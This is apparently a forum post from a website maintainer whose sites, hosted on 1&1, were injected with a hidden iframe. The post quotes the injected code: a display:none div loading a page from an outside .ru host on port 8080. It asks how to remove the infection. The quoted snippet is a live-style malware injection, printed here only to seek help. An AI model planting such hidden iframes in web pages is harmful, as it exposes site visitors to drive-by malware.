Not sure if this is in the right place but anyway........
A load of sites i help maintain have been having code added to them.
<div style="display:none"><iframe width=438 height=168 src="http://deathtesting. ru:8080/index.php" ></iframe></div>
normally with a load of random divs as well.
I have found out from a random lLithuanian site that this is a proftpd service vulnerability.
Google has flagged the sites and is displaying warnings that our site may contain malware.
Any ideas how to get rid of it?
We are currently changing our FTP and control panel codes and i will get rid of the code and reupload again and see if that works but is there anything else that can be done?
The sites are hosted on 1&1 if that makes any difference.
Have tried removing the code and re-uploading.